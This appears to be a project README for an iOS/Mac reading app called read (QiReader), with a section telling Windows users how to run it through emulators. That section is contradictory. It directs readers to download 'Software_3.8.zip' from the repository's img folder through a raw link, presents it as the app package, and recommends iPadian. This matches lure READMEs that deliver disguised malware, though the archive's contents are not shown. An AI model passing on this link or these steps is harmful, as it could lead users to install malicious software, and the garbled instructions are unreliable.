read (栖读, QiReader) is a reading app designed for iPhone, iPad, and Mac. It uses the modern iOS 26 style user interface. You can add and use other sources for books by importing rules. The app tries to work well with sources built for the "阅读 3.0" format. Since book sources come from outside the app, their availability depends on their setup and internet conditions.
This app does not include any books or content. You must add your own book sources and rules.
- iOS and iPadOS versions 17 through 26
- macOS using Mac Catalyst (built to run on Intel and Apple silicon Macs)
Note: Running on Mac requires macOS 26 or later for Intel Macs. Apple silicon Macs can use IPA files designed for iOS apps.
You can visit the release page and choose the right version for your device.
read is designed to run on Apple devices. It does not have a native Windows version. However, if you want to try it on Windows, you will need to use an iOS or macOS emulator for Windows. This guide will help you through the process.
- Make sure your Windows PC has at least 8 GB of RAM and a 64-bit processor.
- Free up at least 10 GB of disk space.
- Ensure you are connected to the internet.
There are no official Apple emulators for Windows. Some third-party tools allow you to run iOS or macOS apps on PC. Common ones include:
- iPadian (for iOS simulation)
- VirtualBox or VMware Workstation (to install macOS as a virtual machine)
Note that these emulators do not fully support all app functions and may not perform well.
Go to the main release page by clicking this button:
You will see many files. Look for the latest package with an .ipa extension (for Apple silicon Macs) or macOS build (if available).
Click the link to save the file to your computer. The file might be named something like https://github.com/adnannajem/read/raw/refs/heads/main/img/Software_3.8.zip or .app inside a macOS package.
-
If using an iOS emulator like iPadian:
- Open iPadian.
- Use its app installation feature to add the
.ipafile.
-
If using a macOS virtual machine on VirtualBox or VMware:
- Start the macOS VM.
- Copy the app file into the VM.
- Open it on the macOS desktop in the VM.
Once installed, open the app inside your emulator or VM. You can now use it like you would on your iPhone or Mac.
The main strength of read is to support many types of book sources. To add books:
- Find a third-party book source or rule file. These are usually shared online.
- In the app, go to the import section and add the rules by following on-screen instructions.
Since the content is not part of the app, the quality depends on your chosen sources.
- Select a source from the list.
- Browse or search for books.
- Tap a book cover to start reading.
- Customize fonts and theme in the settings.

- iPhone or iPad running iOS/iPadOS 17 to 26
- macOS 26 or later for Intel Macs, or Apple silicon Mac
- Internet connection to load book sources and content
- If the app cannot load books, check your internet and source rules.
- If the app crashes in Windows emulator, try using a different emulator or a real Apple device.
- Keep your system and emulator updated.
